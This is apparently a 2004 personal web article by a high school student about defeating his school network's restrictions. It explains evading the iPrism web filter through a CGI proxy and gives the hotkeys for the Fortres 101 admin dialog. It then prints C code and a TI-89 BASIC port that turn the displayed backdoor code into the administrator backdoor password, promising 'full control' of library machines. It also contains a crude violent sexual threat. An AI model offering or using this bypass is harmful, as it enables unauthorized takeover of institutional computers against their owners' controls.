Impulsestorm
Username:   Password:  

Exploring the MHS Network
by Tommy C. Li on 05.05.2004
Updated on 07.10.2004
Over the past few days, I've been exploring the Moorpark High School network. It's interesting. Also, this site is rated by Iprism as being related to "hacking". They mean "cracking" - of course. I've decided to fulfill that rating.

Please note that all this information is a privilage and not meant to be abused. Do not abuse it, or I will personally aid the Administration in hunting you down and raping you - right through the pants.


St. Bernard's Iprism

All Interent traffic is filtered through St. Bernard's Iprism - also known as "the accursed beast". The filter is heavy-handed and inaccurate. It can be easily circumvented with the use of a CGI proxy. I've made some available in the past. The current one is located here.

Fortres in the Library

I've also been on the computers in the library. They are horribly crippled through use of a program known as Fortres 101. I'm pretty sure they are using version 4 of Fortres. I first discovered this because of the odd icon in the system tray, and later, through perusing the C:\FGC folder.

You are totally crippled from doing anything - you cannot even access "My Computer". Luckily, you can browse the filesystem through both the Open and Save dialogs, as well as typing "c:\" in the Internet Explorer address bar. Ironically, it's Microsoft's hated browser-filemanager integration that allows this.

Naturally, I was irritated by the restrictions that made it hard to do any work. I did some research. A paper on Fortres was published in "2600: The Hacker Quarterly", Volume 18, Number 3, Fall 2001. I read it. Fortres basically adds a layer to Windows that checks whether the action is on the "approved list".

Fortress, of course, also has an administrator control panel - password protected. Luckily, there is also a backdoor code used for "emergencies". How it works is that each time you bring up the password dialog, there is a backdoor code generated from the system time. This code is shown to you in the "Enter Password" dialog box. If you forget your password, call Fortres Grand Corporation, give them the backdoor code, and they give you the backdoor password. You must have appropriate identification before they give the password to you.

You can bring up the password dialog by holding down ctrl+shift+esc for Windows 9x, or ctrl+shift+F for NT. For the library computers, it's the latter hotkey.

Well, someone (Amatus) figured out the algorithm used in generating the backdoor password from the backdoor code. Here it is:

// key - the backdoor key
// The return value is the backdoor password
unsigned short backdoor_password( unsigned long key )
{
short x;

x = ((short)( key * -1.2456 ) + 1 ) * 65533;
x = ( x / 2 + 7 ) * 3;
x /= 2;
return x * x;
}

While it may look like some simple arithmatic, it is more. In the C programming language, the "short" variable type is a 16-bit integer. It has a specific range. Unsigned, it can be between 0 and 65535; signed, it can be between -32768 to 32767. If it "overflows" the range, the computer "rolls it over" until it's within range. For example, adding 1 to 32767 yields -32768.

The algorithm makes heavy use of the "rollover" to calculate the final code. Note that the final code is also returned as an unsigned short, so it may be rolled over as well.

I put the code in my C++ compiler, and it did indeed generate working codes. The problem was - I couldn't take my computer to school, and keeping a decryptor program on a floppy disk a bit d?class?. So I set about putting the algorith in my graphing calculator. The problem is that my calculator used TI-BASIC - a different programming language - and there is no "short" type - rather, the variables have a HUGE range (which makes sense - given that it's a calculator).

So there are two programs. One was to simulate the computer converting the number to a signed "short", and the other to do the actual arithmatic operation. "fortres1" does the integer enforcement, while "fortress" does the actual operation. It's in Ti-89 Basic. It should be completely compatible with all TI calculators . You'll have to replace the mod function with an equivalent. Also, you'll have to change some of teh syntax. The code should be self-explanatory - even to laymen.

Note that "->" is the STO assignment button, while the "a<-32867" means "a is less than negative 32867".

fortress()
Prgm
ClrIO
Disp "Backdoor Decoder"
Input a
a*-1.2456->a
fortres\fortres1()
(a+1)*65533->a
fortres\fortres1()
a/2->a
fortres\fortres1()
(a+7)*3->a
fortres\fortres1()
a/2->a
fortres\fortres1()
mod(a*a,65536)->a
Disp "Backdoor Code:"
Disp a
EndPrgm

fortres1()
Prgm
remain(a,65536)->a
If a>32767
a-65536->a
If a<-32867
a+65536->a
iPart(a)->a
EndPrgm

This performs the same operation as the above C function. It's come to my attention that it outputs a different result in some instances. It should still work 95% of the time though.

If you input the ever-changing "backdoor code", it will output the backdoor password. With that, you can disable the restrictions and cause utter chaos if you wanted to. You'd have full control over the machine.

Note that I never said that I actually did any of this. It's just ... theory. Also, Fortres may also be on other computers than the ones in the Library.
More Information

Our wonderful district provides a great deal of information on the specifics of their nework. See this website:
http://www.mrpk.k12.ca.us/web/LINKS/resource.htm



Damn - they should make me a network aide or something - so I have a pretense to know all this shit.


Copyright 2003 Impulsestorm
Home :: Texts :: Projects :: Weblogs :: About :: Links
Texts Quick Navagation
- Technica
  | - A Question of the Impulsestorm Community
  | - Calculator Gaming
  | - Computer Hardware
  | - Exploring the MHS Network
  | - General Computing
  | - Linux
  | - NFL vs. NCAA football
  | - Programming and Design
  | - Securing your Wireless Network
  | - The l33t language
  | - The Lost Art Of Radio
  | - Warfare in Space